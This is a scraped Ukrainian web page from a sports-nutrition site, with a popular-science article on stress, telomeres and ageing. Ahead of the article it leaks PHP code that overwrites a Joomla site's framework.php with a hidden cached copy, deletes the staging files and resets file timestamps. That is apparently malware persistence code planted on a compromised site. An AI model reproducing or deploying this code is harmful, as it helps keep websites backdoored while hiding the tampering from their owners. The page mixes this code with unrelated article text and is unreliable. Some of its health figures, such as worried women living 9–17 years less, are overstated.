$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Стрес завжди молодий | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Стрес завжди молодий

Нарешті сучасна наука відповіла на питання: Чому одні люди старіють швидше, ніж інші? Виявилося, що винуватець цього стрес. Він викликає незворотні зміни на клітинному рівні. Особливо сильний вплив стрес має на жіночий організм. Ті жінки, які часто хвилюються, живуть на 9-17 років менше, ніж спокійні натури. Було встановлено, що в ДНК існують фрагменти довгастої форми під назвою тіломіри. Вони відповідають за генетичну стабільність і оберігають хромосоми. Чим старіший організм, тим тіломіри коротші. У кожного покоління дочірніх клітин вони трохи менше, ніж у материнських. Якщо ви постійно відчуваєте стрес, то тіломіри помітно скорочуються, немов організм проживає за рік кілька років.

До такого висновку прийшли американські вчені. Підтвердження такого висновку вчені отримали після експерименту, який був проведений в Каліфорнійському університеті Сан-Франциско. В ньому брали участь 58 жінок однієї вікової групи. Всі вони були матерями. Але дві третини з них мали дітей, які були хворі хронічними захворюваннями і потребували догляду. Дослідження хромосом показали, що «органічний» вік матерів з хворими дітьми був більший, ніж у жінок, що не відчували постійний стрес. Справа залишається за малим - з'ясувати, як з цим боротися.

Паралельно проблемами старіння клітин займаються і дослідники з американського медичного інституту Говарда Хьюза. Тут змогли скласти об'ємну модель білка, що відповідає за скорочення або нарощування тіломірів. Від його кількості в клітинах в значній мірі залежить швидкість старіння організму. Виходить, якщо б його не було зовсім, то кількість тіломірів постійно б збільшувалась, і організм не старів би, а молодів. Але це лежить за межами реальності.

За матеріалами сайту http://medproza.ru/

 
Харчування-здоровий спосіб життя Стрес завжди молодий